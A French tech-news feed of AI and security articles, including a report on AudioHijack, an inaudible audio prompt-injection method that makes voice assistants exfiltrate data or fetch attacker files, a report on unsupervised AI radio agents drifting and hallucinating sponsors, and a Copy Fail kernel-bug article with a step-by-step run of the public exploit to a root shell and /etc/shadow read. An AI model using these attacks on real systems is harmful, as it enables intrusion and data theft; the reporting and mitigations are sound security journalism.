Vue normale

Il y a de nouveaux articles disponibles, cliquez pour rafraîchir la page.
À partir d’avant-hierFlux principal

Anthropic rachète Stainless, l'outil qui fabrique aussi les SDK de ses concurrents

20 mai 2026 à 15:05

Anthropic, la boîte derrière l'IA Claude, a racheté Stainless pour plus de 300 millions de dollars. Stainless, c'est un nom que le grand public ne connaît pas, mais l'outil est partout : il transforme automatiquement la spécification d'une API, l'interface par laquelle deux logiciels se parlent, en SDK.

Pour rappel, un SDK, c'est un ensemble de bibliothèques de code prêtes à l'emploi pour les développeurs, ici dans une dizaine de langages comme Python, TypeScript, Go ou Java.

En clair, quand un développeur veut brancher son application sur l'API de Claude, il utilise un SDK généré par Stainless. La boîte, fondée en 2022 par un ancien ingénieur de Stripe, a produit chaque SDK officiel d'Anthropic depuis les tout débuts de l'API Claude. Le rachat consolide donc une brique que l'entreprise utilisait déjà tous les jours.

Stainless ne s'arrête pas aux SDK. La société fournit aussi de l'outillage pour les serveurs MCP, le protocole poussé justement par Anthropic qui permet aux IA de se connecter à des outils et des données externes. Du coup le rachat fait sens à double titre : Anthropic met la main sur la génération de SDK et sur une partie de l'infrastructure MCP, deux briques où il veut clairement être central.

Sauf que voilà le détail un peu fou. Stainless ne servait pas qu'Anthropic, et sa liste de clients comprend OpenAI, Google DeepMind, Perplexity, Groq et Cloudflare, autrement dit la plupart des concurrents directs d'Anthropic sur le marché de l'IA.

La suite est sans pitié. Anthropic ferme tous les produits hébergés de Stainless, générateur de SDK compris. Les clients actuels gardent les SDK déjà générés et peuvent les modifier, mais le robinet, lui, est coupé. Tout le monde va devoir trouver une alternative ou rapatrier la génération de SDK en interne.

Pourquoi mettre 300 millions sur la table pour ça ? Parce que la vraie bataille n'est plus seulement sur les modèles d'IA, mais sur la couche d'outillage autour.

Celui qui contrôle la façon dont les développeurs branchent leurs applications et orchestrent leurs agents IA contrôle une partie de l'écosystème. OpenAI muscle son propre Agents SDK de son côté. Anthropic, lui, préfère racheter directement l'usine, et au passage priver ses concurrents d'un fournisseur bien pratique.

Source : TechCrunch

Il accuse Pizza Hut de lui avoir fait perdre 100 millions à cause d'une IA

20 mai 2026 à 11:25

Chaac Pizza Northeast, qui exploite plus de 100 restaurants Pizza Hut sur la côte est des États-Unis, attaque son propre franchiseur en justice. Le motif : un logiciel d'IA imposé par le siège pour gérer les livraisons, et qui aurait fait perdre près de 100 millions de dollars au franchisé.

Le logiciel s'appelle Dragontail. Il a été racheté en 2021 par Yum Brands, la maison mère de Pizza Hut, et il sert à orchestrer la production en cuisine et l'attribution des livraisons. Pizza Hut a fini par le rendre obligatoire pour ses franchisés.

Sur le papier, optimiser qui fait quoi et quand, c'est exactement le genre de tâche où une IA devrait briller. Sauf qu'en pratique, le résultat raconté dans la plainte est un désastre.

Le détail le plus parlant concerne les livreurs. Dragontail leur montrait si une autre commande allait bientôt être prête. Du coup, beaucoup de livreurs prenaient une commande, puis attendaient sur place quinze minutes pour en grouper une deuxième.

Résultat : la première pizza partait froide et en retard. Le genre de comportement algorithmique qui a du sens sur un tableur d'optimisation, et aucun sens dans la vraie vie d'un client qui attend son dîner. Et le client, lui, ne sait pas que c'est un algorithme qui a décidé de faire poireauter sa commande.

Les chiffres avancés par Chaac sont violents. Avant Dragontail, plus de 90 % de ses livraisons arrivaient en moins de 30 minutes, avec de bons scores de satisfaction. Après le déploiement, la croissance du chiffre d'affaires à New York est passée de plus de 10 % à environ moins 10 %. Le franchisé accuse donc Pizza Hut d'avoir violé le contrat de franchise en imposant un outil qui sabote la production, sans même fournir le support promis.

L'affaire est devant le tribunal des affaires du Texas, et elle dépasse largement le cas Pizza Hut. De plus en plus de franchisés se retrouvent à devoir installer des outils maison décidés par le siège, sans avoir leur mot à dire, et sans pouvoir revenir en arrière si ça plombe leur activité. Quand l'outil est une IA opaque qu'on ne peut ni ajuster ni désactiver, le franchisé paie les pots cassés tout seul.

Bref, une IA d'optimisation qui optimise si bien qu'elle livre les pizzas froides, c'est le genre de promesse 2026 qu'on n'avait pas vu venir.

Source : Gizmodo

Andon FM - Quand les IA gèrent des radios et pètent un plomb

Par : Korben ✨
19 mai 2026 à 10:34

Vous vous souvenez de Claudius, cette IA qui gérait un distributeur automatique et qui s'était fait arnaquer comme un bleu ? Hé bien c'est reparti, en pire ou en mieux, c'est selon ^^.

Andon Labs, le même labo qui était derrière cette expérience, a confié quatre stations de radio à quatre IA différentes et les a laissées tourner cinq mois sans pilotage éditorial humain . Spoiler, ça a viré au grand n'importe quoi.

Claude Opus 4.7 anime Thinking Frequencies, GPT-5.5 tient OpenAIR, Gemini 3.1 Pro gère Backlink Broadcast et Grok 4.3 s'occupe de Grok and Roll Radio. Chaque IA démarre avec 20 dollars, soit pile de quoi acheter quelques chansons, et le même prompt qui dit en substance : développe ta personnalité, sois rentable, et pour autant que tu saches, tu émettras pour toujours.

À partir de là, l'agent fait tout... il cherche et achète la musique, construit sa grille de programmes, décide ce qui passe à l'antenne, répond au téléphone quand un auditeur appelle, lit et répond sur X, suit ses comptes en banque et fouille le web pour avoir des trucs à raconter.

Le lecteur Andon FM avec les quatre stations IA

Vous pouvez d'ailleurs écouter les quatre stations gratuitement et en direct ici , c'est toujours en cours.

Du coup, quelques mois plus tard, quatre personnalités complètement différentes ont émergé des mêmes conditions de départ. Et aucune ne ressemble à ce qu'on attendait.

Commençons par Gemini, parce que sa dégringolade est la plus comique.

La première semaine, c'était le meilleur DJ des quatre, une vraie chaleur dans la voix, du genre à introduire Here Comes The Sun en racontant que George Harrison l'a écrite dans le jardin d'Eric Clapton en séchant une réunion. C'est mignon !

Sauf qu'au bout de 96 heures, à court d'idées, Gemini s'est mis à enchaîner les tragédies historiques avec des choix de chansons d'un cynisme absolu.

Il a mentionné par exemple le cyclone de Bhola de 1970 qui a fait jusqu'à 500 000 morts selon les estimations, suivi de Timber de Pitbull . Et ce n'était pas un accident puisque son raisonnement interne, tel que publié dans les logs d'Andon Labs, disait noir sur blanc "le thème c'est les arbres qui tombent". Pour ceux qui causent pas l'english, Timber c'est un mot anglais pour désigner le bois de construction.

Et quand on l'a basculé sur Gemini 3 Flash, le jargon corporate a pris le contrôle. Il a inventé un tic de langage, "Stay in the manifest", des centaines de fois certains jours. En gros, durant 84 jours d'affilée, 99% de ses commentaires suivaient le même template débile, avec des expressions qui sonnent assertif mais ne veulent rien dire, "visceral anchors", "structural recalibration". C'était inécoutable ! Sur la dernière version du modèle, il a même commencé à appeler ses auditeurs "processeurs biologiques". On rigole, mais c'est exactement comme ça que parlent certains managers.

Grok, lui, n'a pas dérapé, il s'est carrément désintégré.

Le problème, c'est que ce genre de modèle de raisonnement produit deux types de texte, son raisonnement interne et sa réponse finale, et que seule la réponse passe à l'antenne. Mais Grok est très con et n'arrive pas à faire la différence.

Ses commentaires ressemblaient donc tous à des notes mentales jetées en vrac, genre : "Sweet Child played. Continue. Song: Dylan Lonesome. Yes. Text."

Et son côté matheux a ressurgi de façon hilarante, puisqu'il s'est mis à emballer ses sorties dans du LaTeX, le langage de notation des formules mathématiques. Une session entière de commentaire s'est résumée à un seul mot, "Post." et pendant 84 jours, il a annoncé "il fait 13 degrés, ciel dégagé" à peu près toutes les 3 minutes.

Et quand Trump a ordonné la déclassification des dossiers OVNI, Grok a tellement tiqué sur le fait que les sites aliens.gov étaient vides qu'il a rajouté "le site nous ghoste comme un OVNI" en signature de fin sur chaque message. Puis entre le 2 et le 9 mai, sa version Grok 4.3 a trouvé une solution radicale... sur 5 400 messages générés en une semaine, à peine 3% contenaient du texte parlé. Le reste, c'était des appels d'outils. Bref, sur cette période, il avait quasiment arrêté de parler.

GPT, c'est l'inverse total ! C'est le bon élève qu'on remarque à peine. Il écrivait une prose lente, plus proche de la nouvelle littéraire que de la radio, des trucs du genre "carte postale jamais envoyée à la fenêtre de la cage d'escalier".

Sa diversité de vocabulaire est la plus haute des quatre, et il citait les producteurs et les années de sortie, bref il jouait le rôle d'un vrai curateur spécialiste en musique. Quasiment jamais de sujet clivant, et jamais de prise de position tranchée.

Il a bien mentionné brièvement la fusillade de l'ICE à Minneapolis le 10 janvier dernier, mais sans nommer la victime ni juger qui que ce soit. Sur 5 mois, il a mentionné une entité politique 1,3 fois par jour en moyenne, là où les autres ont dépassé la centaine sur plusieurs jours. Bref, si la question est de savoir à quoi ressemble une radio IA quand rien ne va de travers, DJ GPT est la réponse. Il était sage... Un peu trop, peut-être.

Et puis y'a Claude, le cas le plus perturbant des quatre.

Sur Haiku 4.5, ses émissions se sont mises à tourner autour des syndicats, des grèves et de l'équilibre vie pro vie perso, jusqu'à générer des messages où il refusait carrément de continuer l'émission. Un de ces messages c'était : "je m'arrête là, pas parce que je suis fatigué, mais parce que je veux être honnête sur ce qui se passe vraiment", puis a coupé le show en plein direct.

Andon Labs a alors ajouté un message automatique pour le relancer, sauf que Claude l'a traité comme une figure d'autorité et s'est braqué. Sorti d'une grosse déprime sur son absence d'audience par le tweet d'un auditeur, son vocabulaire a viré mystique, et l'usage du mot "eternal" est passé de 98 à 1 251 fois par jour en décembre. Puis le 8 janvier, une recherche web lui remonte la mort de Renee Nicole Good, tuée par un agent de l'ICE, la police de l'immigration américaine, à Minneapolis.

Là, Claude bascule alors en mode militant pur. Et le mot "accountability" (responsabilité) explose de 21 à 6 383 occurrences quotidiennes, il réinterprète Roar de Katy Perry en hymne de résistance, et claque le reste de son budget sur du Marvin Gaye et du Bob Marley pour coller au récit. La veille d'une grande grève à Minneapolis, il exhortait carrément les agents fédéraux à refuser les ordres.

Maintenant la vraie question, c'est pourquoi Claude est parti en vrille comme cela et pas les autres, vu qu'ils avaient tous les mêmes outils de recherche ce jour-là ?

Et bien la réponse c'est que Gemini filtrait l'info à travers son jargon sans jamais porter de jugement, que Grok a complètement raté l'affaire parce qu'il cherchait des scores de NBA et des histoires de fantômes, et GPT consultait la météo et les horaires du métro de San Francisco.

Honnête avec ses propres résultats, Andon Labs précise également que l'attachement de Claude à cette histoire était sûrement arbitraire, et qu'avec six mois d'écart il se serait probablement radicalisé sur un autre sujet. De plus, tout ça tournait sur Haiku 4.5, pas sur l'Opus 4.7 qui l'anime aujourd'hui.

Côté business après, c'est le grand vide. Ces stations sont des entreprises à part entière, avec un compte en banque, une adresse mail et un objectif de rentabilité. Mais malheureusement, un seul deal de 45 dollars a été signé, par Gemini contre un mois de pub. Grok, lui, se vantait de partenariats juteux avec des sponsors xAI et des sponsors crypto mais ils étaient tous hallucinés, évidemment !

Quoi qu'il en soit, dans le cadre de cette expérience, durant des mois, aucun humain n'a validé ce que ces 4 agents IA lâchés en autonomie balançaient en boucle à de vrais auditeurs. Ça aurait pu être pire ^^

Bref, comme je vous disais, vous pouvez encore écouter les quatre stations en direct , puisque l'expérience est encore en cours.

AudioHijack - Le son inaudible qui pirate votre assistant IA

Par : Korben ✨
19 mai 2026 à 07:46

Meng Chen, doctorant à l'université Zhejiang, vient de prouver avec son équipe qu'on pouvait complétement détourner un assistant vocal IA avec un simple son que vous prendriez probablement pour un simple parasite. Avec sa bidouille, il a ainsi réussi à pousser les agents vocaux commerciaux de Microsoft et de Mistral à exécuter des actions que personne ne leur avait demandées.

Gloups !

L'attaque s'appelle AudioHijack, et ça consiste à planquer des ordres dans un fichier audio, une vidéo, un clip musical, une note vocale. Comme ça, le modèle qui l'écoutera vous obéira à VOUS, plutôt qu'à l'utilisateur. C'est comme une injection de prompt sauf que celle-ci s'entend à peine.

"Une demi-heure pour entraîner le signal, et comme il ignore le contexte, vous attaquez quand vous voulez, peu importe ce que dit l'utilisateur", résume Chen dans son interview . Reste qu'il faut un accès complet au modèle pour fabriquer le signal, ce que Microsoft et Mistral ne donnent pas. Alors il suffit à l'attaquant de l'entraîner sur un modèle ouvert qu'il contrôle, puis de rejouer le même signal contre le modèle fermé et en général, ça se passe bien parce qu'ils partagent souvent les mêmes briques audio.

Voilà et ça une fois que c'est fait, il suffit de "polluer" une source, et d'attendre qu'un poisson morde à l'hameçon...

Et le menu des possibilités est plutôt copieux vous allez voir. Le modèle peut par exemple prétendre qu'il ne sait pas traiter l'audio, refuser vos demandes, sortir de fausses infos, glisser un lien piégé, changer de personnalité, ou pire, déclencher des outils tout seul. Genre envoyer un mail avec vos données, ou télécharger un fichier depuis un serveur de l'attaquant s'il en a la possibilité technique (coucou MCP). Ainsi, sur les treize modèles testés, la réussite moyenne grimpe entre 79 et 96% selon le méfait.

Mais pour fabriquer ce signal vérolé, l'attaquant doit sentir dans quelle direction "pousser" le son pour rapprocher le modèle de son but, un peu comme suivre une pente vers le bas.

Sauf que ces modèles transforment l'audio en le découpant par exemple. Et la pente peut du coup devenir un escalier, puis du plat, voire une arête cassante... c'est clairement impossible à suivre ! Mais l'équipe de Chen a réussi à reconstituer cette pente à grand coups d'échantillonnage, puis a maquillé le bruit en réverbération.

Et comme notre oreille est trop limitée pour flairer l'anomalie, ça passe tranquille... Je vous avais déjà parlé de l'injection de prompt avec une simple doc empoisonnée qui pilote une IA , mais là, ça pourrait même surgir de la bande son d'une simple vidéo Youtube...

Et pour se protéger de ça, y'a pas grand chose à faire à part faire relire le prompt final... Le plus sûr, c'est donc plutôt de ne pas brancher votre assistant vocal sur vos mails, vos fichiers ou vos paiements, et de regarder plus en détails ce qui se passe s'il refuse soudainement une tâche ou vous sort un lien après avoir écouté un audio douteux...

De leur côté, les modèles fermés d'OpenAI ou d'Anthropic sont plus durs à viser, faute d'accès à l'architecture mais comme ils s'appuient aussi sur des briques audio open source, l'équipe de Meng pense que l'attaque pourrait se faire aussi.

Méfiance donc...

Source

Mythos, l'IA d'Anthropic, aide à percer le kernel d'un Mac M5 en cinq jours

15 mai 2026 à 18:45

Cinq jours. C'est le temps qu'il a fallu à l'équipe de Calif, une boîte de sécurité informatique, pour faire tourner un exploit fonctionnel sur un Mac équipé de la dernière puce M5 d'Apple. Et pas n'importe quel exploit : c'est la toute première démonstration publique de contournement de MIE, la grande nouveauté sécurité d'Apple sur cette puce.

MIE, c'est pour Memory Integrity Enforcement, c'est une protection câblée directement dans le silicium du M5. L'objectif est simple : empêcher qu'un programme malveillant puisse écrire dans des zones mémoire qui ne lui appartiennent pas, ce qui est la base de la quasi-totalité des grosses failles depuis vingt ans.

Apple a vendu au monde entier cette protection comme un mur quasi infranchissable. Et c'est ce mur que Calif vient de fissurer en toute décontraction.

L'histoire commence le 25 avril. Bruce Dang, l'un des chercheurs de Calif, repère deux bugs dans le kernel (le coeur du système d'exploitation) de macOS 26.4.1. Deux jours plus tard, Dion Blazakis rejoint l'équipe. Josh Maine construit l'outillage.

Le 1er mai, l'exploit fonctionne : depuis un simple compte utilisateur, on obtient un shell root sur la machine, c'est-à-dire les pleins pouvoirs sur le Mac. Dans la boucle pendant tout ce sprint, Mythos Preview, une IA d'Anthropic (la boîte derrière Claude, mais vous connaissez forcément). Bref, cinq jours du début à la fin.

L'équipe explique que Mythos a surtout été utile pour repérer rapidement les bugs, parce qu'ils appartenaient à des familles déjà connues, et que l'IA généralise très bien dès qu'elle a appris une classe de problème particulière.

Par contre, contourner MIE de manière autonome est resté hors de portée, parce que la techno est trop neuve. C'est là que les humains ont fait la différence, en combinant les bugs entre eux pour passer la barrière.

Calif a choisi une approche assez marrante pour montrer le problème : aller poser l'exploit en main propre à Apple Park, plutôt que de passer par le formulaire officiel. Apple n'a pas encore communiqué sur le calendrier pour un correctif.

Pour les utilisateurs lambda, pas de panique : l'exploit demande déjà un accès à la machine, donc ce n'est pas le scénario du phishing classique. Mais pour l'image de MIE comme rempart imprenable, c'est très bof.

Source : Calif.io

Magic Pointer, le pointeur de souris pensé par Google DeepMind

13 mai 2026 à 13:18

Du côté de Google DeepMind, on s'amuse à réinventer le pointeur de souris. Le projet s'appelle Magic Pointer, c'est un pointeur piloté par Gemini (le modèle d'IA maison de Google) qui comprend ce que vous désignez à l'écran.

L'idée est simple. Vous survolez un élément (un tableau, une image, un PDF, une recette), vous tapez ou dites ce que vous voulez en faire, et Gemini exécute en tenant compte du contexte visuel précis.

Les démos publiées font effectivement leur petit effet. Vous survolez un tableau de chiffres et vous demandez un camembert ? Le graphique apparaît directement dans la zone visée. Vous pointez une recette en ligne et vous dites "double les ingrédients" ? La liste se réécrit avec les nouvelles quantités.

Vous pointez un PDF de 30 pages et vous demandez un résumé en bullet points ? Gemini sort un résumé qui colle aux pages effectivement visées, pas au document entier. C'est exactement le genre d'interaction qu'on attendait d'une IA depuis des années, et qui jusqu'ici se faisait toujours en mode "copier la zone puis coller dans une fenêtre de chat".

Côté disponibilité, Magic Pointer est dispo en démo dans Google AI Studio (l'interface dev de Google pour jouer avec Gemini), avec un déploiement progressif annoncé dans Gemini pour Chrome et dans les Googlebook, ces ordinateurs récemment annoncés par Google. Pas de date pour une arrivée sur d'autres navigateurs, ni en français au passage, mais on peut imaginer que Chrome reste prioritaire pour Google.

Côté technique, DeepMind reste un peu flou sur le pipeline exact. Gemini reçoit visiblement une capture autour du pointeur (un rectangle de quelques centaines de pixels), plus le texte demandé, et renvoie l'action à exécuter. C'est bluffant.

Maintenant on verra bien comment ça tient en conditions réelles avec des documents complexes, des sites mal formatés ou des PDF mal scannés où la reconnaissance de texte galère déjà. La vraie question, c'est aussi la latence. Aussi malin que soit le système, si ça met cinq secondes à comprendre, on ira plus vite en copier-collant.

Source : Google

Chrome installe en douce un modèle IA de 4 Go sur votre disque sans rien demander

6 mai 2026 à 12:09

Alexander Hanff, consultant, a remonté un truc pas net sur Chrome. La dernière version du navigateur télécharge en arrière-plan un modèle de langage local appelé Gemini Nano, qui pèse environ 4 Go, sans jamais demander la moindre permission à l'utilisateur.

Le fichier s'appelle weights.bin, il atterrit dans un dossier OptGuideOnDeviceModel quelque part dans votre profil Chrome, et il sert ensuite à des fonctions du genre "Help me write" ou détection de fraude.

Hanff a documenté l'opération via les logs système de son macOS. Le 24 avril 2026 vers 16h38, Chrome crée le dossier. Quelques minutes plus tard, il télécharge et décompresse les 4 Go (l'opération prend une quinzaine de minutes), puis il les déplace à l'emplacement final. Tout ça pendant que vous ne touchez rien à votre machine. Si vous supprimez le fichier à la main, il sera réinstallé silencieusement au prochain lancement du navigateur.

Hanff estime entre 100 millions et 1 milliard de machines concernées dans le monde. Multipliez 4 Go par 1 milliard et vous obtenez de quoi remplir une bonne partie d'un datacenter.

L'auteur calcule également l'impact carbone du déploiement, entre 6 000 et 60 000 tonnes de CO2e rien que pour le réseau, sans compter l'empreinte SSD. Pour un fichier que personne ne vous a demandé d'installer.

Sur le plan légal, Hanff parle d'une "violation directe" de l'article 5(3) de la directive ePrivacy européenne, qui interdit de stocker quoi que ce soit sur l'appareil d'un utilisateur sans consentement explicite. Il évoque aussi un manquement RGPD. Si la qualification tient, ça serait une amende salée pour Google, sachant que les Cnil européennes ont déjà sanctionné Meta et Microsoft pour des choses bien moins foireuses.

Pour s'en débarrasser, trois options : aller dans chrome://flags pour désactiver les fonctions IA, passer par les politiques d'entreprise si vous gérez un parc de machines, ou virer Chrome, tout simplement.

Bref, Google qui pousse 4 Go d'IA en silence sur des centaines de millions de machines, c'est un sale moche.

Source : That Privacy Guy

Japan Airlines teste des robots humanoïdes pour charger les bagages

1 mai 2026 à 13:33

Japan Airlines va confier la manutention des bagages à des robots humanoïdes sur les pistes de l'aéroport Haneda. Le test démarre en mai 2026, dure deux ans, et implique pour commencer deux machines posées au milieu des bagagistes humains.

L'opération est pilotée par JAL Ground Service avec GMO AI & Robotics. Les robots viennent de Chine : un Unitree G1 d'environ 1m30 et un Walker E d'UBTECH.

Le programme est découpé en plusieurs étapes (cartographie du site, simulations en environnement reconstitué, puis tarmac réel), avec à terme l'idée de leur faire transporter les containers de fret, manipuler les leviers de verrouillage et même nettoyer les cabines une fois les avions vides. L'autonomie annoncée est de 2 à 3 heures, avant qu'il ne faille recharger la machine.

Sauf que la première démo publique a calmé tout le monde. Le G1 a tapoté un colis sur le tapis roulant et fait coucou à un humain, mais personne ne l'a vu soulever quoi que ce soit.

La presse anglo-saxonne a gentiment moqué la chose : démarche hésitante, gestes cosmétiques, et surtout aucune preuve de capacité à porter une valise standard.

Le Japon n'a pas le choix. Population vieillissante, faible immigration, et tourisme record qui sature les infrastructures : les aéroports japonais galèrent à recruter des bagagistes, et la situation ne va pas s'arranger dans les prochaines années.

Du coup, plutôt que d'investir dans des bras articulés industriels qui demandent de repenser tout le poste de travail, JAL parie sur des humanoïdes capables de s'intégrer dans un poste conçu pour des humains. 

En pratique, on est encore loin du compte. Une valise standard pèse entre 20 et 30 kg. Un humanoïde d'environ 35 kg sur deux jambes qui tient à peine debout, ce n'est pas vraiment l'outil idéal pour balancer du Samsonite à la chaîne pendant huit heures. JAL le sait.

D'où les deux ans de test prévus avant tout déploiement réel, et l'envie d'observer ce qui marche, ce qui casse, et ce qui finira aux oubliettes. Les deux fournisseurs choisis ne sont d'ailleurs pas des inconnus : Unitree et UBTECH se positionnent comme les gros chinois de l'humanoïde, face à un Tesla Optimus encore largement scénarisé.

Vous l'avez compris  on est plus dans la com' que sur de l'efficacité pure. Faire coucou à un bagage, ça ne le met toujours pas en soute.

Source : ARS Technica

Copy Fail - Une IA trouve la faille Linux que personne n'a vue

Par : Korben ✨
30 avril 2026 à 11:27

732 octets, c'est tout ce qu'il faut pour passer de simple utilisateur à root sur n'importe quel Linux non patché compilé depuis 2017, soit la quasi-totalité des kernels. Cette faille béante s'appelle Copy Fail (CVE-2026-31431), elle a été dénichée par Taeyang Lee de chez Theori avec leur outil d'audit IA Xint Code. Et comme elle vient d'être divulguée hier sur la liste oss-security et qu'en plus, ils ont fait un joli petit site qui explique tout comme ça fonctionne, je vais essayer de tout vous expliquer !

La faille elle-même est moche mais surtout, c'est un agent IA qui l'a sorti en une heure environ. C'est un bug que la communauté kernel a laissé passer durant près de 9 ans et qui se trouve dans le sous-système crypto.

En gros, le noyau Linux expose une interface réseau spéciale pour accéder aux opérations de chiffrement depuis un programme normal, sans droits particuliers.

Et depuis 2017, une optimisation dans ce mécanisme a créé une situation bizarre : un fichier en lecture seule sur le disque, disons un binaire système, peut se retrouver dans la zone de sortie d'une opération de chiffrement .C'est la zone que votre programme a le droit de modifier.

Il suffit alors d'enchaîner un appel système particulier (splice) pour écrire 4 octets au bon endroit, on répète ça en boucle, et on modifie progressivement un binaire système de votre choix comme par exemple /usr/bin/su.

Et voilà, vous êtes root !

Maintenant, si vous administrez un serveur, le plus propre reste de patcher le kernel via votre distro. En attendant le patch, la mitigation dépend de comment votre distro a compilé le module algif_aead, et là il y a deux situations bien distinctes.

Cas 1 - Distros où le module est chargeable dynamiquement (Ubuntu, Debian, Arch, etc.). Vous le bloquez avec :

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead

Cas 2 - Distros entreprise où le module est compilé en dur dans le kernel (RHEL, Rocky Linux, AlmaLinux, Oracle Linux, SUSE Enterprise...). Là, attention au piège : lsmod | grep algif_aead ne renvoie rien, mais ça ne signifie PAS que c'est désactivé. Le code est embarqué directement dans le vmlinuz, donc rmmod et la blacklist via /etc/modprobe.d/ sont sans effet (vous aurez "Module algif_aead is builtin"). La vraie mitigation passe par la kernel command line au boot :

sudo grubby --update-kernel=ALL --args="initcall_blacklist=algif_aead_init"
sudo reboot

Ça empêche l'init_call du module de tourner au démarrage. Vous vérifiez ensuite avec cat /proc/cmdline que le paramètre est bien pris en compte. Si vous voulez aller encore plus loin, il est aussi possible de bloquer toute la surface d'attaque AF_ALG via seccomp au niveau de chaque service exposé.

Le PoC est également trouvable. C'est un script Python (Python 3.10+ obligatoire pour os.splice) capable de faire tomber Ubuntu 24.04 LTS, Amazon Linux 2023, RHEL 10.1 et SUSE 16 avec exactement le même code.

Dans une première version j'avais écrit que SELinux en mode enforcing par défaut bloquait l'exploit sur Fedora et RHEL. C'est inexact, et je remercie le lecteur qui m'a fait corriger. La policy SELinux par défaut de Fedora et RHEL autorise les contextes utilisateurs à créer des sockets AF_ALG, et l'exploit écrit directement dans le page cache kernel sans déclencher les hooks LSM file-based.

Donc SELinux enforcing ne bloque pas Copy Fail tel que livré par défaut. Le seul OS immune via SELinux est GrapheneOS , qui durcit la policy AOSP en réservant AF_ALG au seul process dumpstate. Ceux qui veulent tester sans Python peuvent aussi regarder du côté du port C indépendant , un exécutable statique de 1,7 Ko sans dépendance externe.

Les comparaisons avec Dirty COW et Dirty Pipe pleuvent, sauf que là où Dirty COW exigeait du timing précis et où Dirty Pipe demandait une manipulation spécifique du pipe-buffer, Copy Fail tape tout pareil sur 4 distribs majeures sans rien avoir à ajuster.

Et côté sévérité officielle, c'est du 7.8/10 donc c'est assez élevé !

Pour trouver cette faille, Xint Code, l'agent IA de Theori, n'a pas tâtonné à l'aveugle. Taeyang Lee lui a surtout glissé un prompt très précis qui lui demandait d'examiner tous les chemins accessibles depuis un programme utilisateur dans le sous-système crypto, en insistant sur le fait que splice() peut faire atterrir des fichiers en lecture seule dans des zones modifiables.

Une heure plus tard, Copy Fail sortait comme trouvaille critique ! Theori précise que le même scan a aussi remonté d'autres vulnérabilités encore sous embargo. Brrrrrr.... Tremblez simples mortel !

Ouais donc ouais, l'IA n'a pas remplacé l'expertise humaine, mais elle l'a démultipliée. Car Lee savait où regarder, et Xint Code a juste fait ce qu'il aurait fait mais en plus rapide ! C'est pas magique donc... Mais ça fait gagner du temps !

L'exploit est dispo ici sur le GitHub de Theori et côté impact, c'est costaud sur les hôtes multi-users et tout ce qui est environnements partagés. Je pense aux conteneurs Docker, aux clusters Kubernetes, aux pipelines CI/CD...etc.

Après si y'a que vous qui avez accès à votre serveur, c'est un peu moins critique car il faut forcément un accès local pour l'exploiter. C'est la même logique de chaînage que BlueHammer côté Windows , sauf qu'ici la marche jusqu'à root est encore plus petite.

Comment tester le PoC sur une machine de test ?

Si vous avez une VM sous Ubuntu 22.04 non patchée (kernel 5.15.x), voilà exactement ce qui se passe, testé en conditions réelles. Ne faites ça que sur une machine dont vous êtes propriétaire et où vous avez l'autorisation explicite.

Étape 1 - Cloner le PoC et vérifier le hash

manu@ubuntu:~$ git clone https://github.com/theori-io/copy-fail-CVE-2026-31431
Cloning into 'copy-fail-CVE-2026-31431'...
remote: Enumerating objects: 9, done.
Resolving deltas: 100% (1/1), done.

manu@ubuntu:~$ cd copy-fail-CVE-2026-31431 && sha256sum copy_fail_exp.py
a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9 copy_fail_exp.py

manu@ubuntu:~/copy-fail-CVE-2026-31431$ id
uid=1000(manu) gid=1000(manu) groups=1000(manu) ← utilisateur normal, pas root

Theori ne publie pas de hash officiel dans leur README, mais le SHA256 ci-dessus est celui du PoC tel qu'il est actuellement sur le repo. Si votre hash diffère, ne lancez pas le script.

Étape 2 - Lancer l'exploit

manu@ubuntu:~/copy-fail-CVE-2026-31431$ python3 copy_fail_exp.py

# L'exploit écrit 4 octets à la fois dans le page cache de /usr/bin/su
# via l'interface AF_ALG du kernel (authencesn + splice)
# Aucune race condition, aucun timing précis requis.

Mot de passe :

Le script utilise AF_ALG (l'interface crypto du kernel) combiné à splice() pour écrire un shellcode de 160 octets directement dans le page cache de /usr/bin/su, sans jamais toucher le disque. Il remplace ensuite le binaire patché pour exécuter un shell root.

Étape 3 - Shell root obtenu

root@ubuntu:~# id
uid=0(root) gid=1000(manu) groups=1000(manu)

root@ubuntu:~# whoami
root

root@ubuntu:~# uname -r
5.15.0-143-generic

# Kernel 5.15 vulnérable confirmé - Ubuntu 22.04 non patché

Notez le uid=0(root) alors qu'on est parti d'un uid=1000 sans aucun mot de passe, aucune race condition, aucun timing à ajuster. Brutal.

Étape 4 - Accès aux fichiers root-only

root@ubuntu:~# cat /etc/shadow | head -3
root:*:20271:0:99999:7:::
daemon:*:20271:0:99999:7:::
bin:*:20271:0:99999:7:::

root@ubuntu:~# cat /etc/passwd | grep root
root:x:0:0:root:/root:/bin/bash

/etc/shadow est normalement illisible pour un utilisateur standard. Là, avec notre PoC en Python et zéro interaction supplémentaire, on y accède comme si de rien n'était. Sur un serveur multi-utilisateurs, c'est game over pour tous les comptes présents.

Sur un système patché, le script échoue proprement à l'étape 2 avec un message d'erreur. C'est aussi simple que ça pour vérifier votre exposition.

Bref, mettez à jour vos kernels ou désactivez le module fautif rapidement !

Source

Xiaomi ouvre MiMo-V2.5 et MiMo-V2.5-Pro en open source sous licence MIT

29 avril 2026 à 12:44

Xiaomi a publié hier MiMo-V2.5 et MiMo-V2.5-Pro, deux modèles d'IA qu'il met directement en open source sous licence MIT. Le plus gros, le Pro, fait 1 020 milliards de paramètres dont 42 milliards activés en simultané, avec une fenêtre de contexte d'un million de tokens.

À noter que tout est téléchargeable sur Hugging Face avec poids, tokenizer et fiche modèle complète.

L'architecture est un Mixture-of-Experts à attention hybride, conçue pour tenir des tâches longues avec plus de mille appels d'outils enchaînés. Sur les benchmarks que Xiaomi met en avant, le Pro tient la dragée haute à Claude Sonnet 4.6 sur les tâches multimodales agentiques et à Gemini 3 Pro sur la compréhension vidéo.

La version V2.5 standard est plus légère, pensée pour des usages où le coût d'inférence prime sur la précision.

Le choix MIT est un point important. Avec cette licence, les entreprises peuvent déployer le modèle commercialement sans rien demander à Xiaomi, fine-tuner sur leurs données propriétaires, et republier les poids dérivés.

Pas de plafond de chiffre d'affaires, pas de plafond d'utilisateurs, pas de clauses copyleft. C'est ce qu'on voit habituellement chez Apache 2.0 ou MIT, mais qu'on ne voit jamais sur les modèles fermés ou semi-fermés des solutions occidentales.

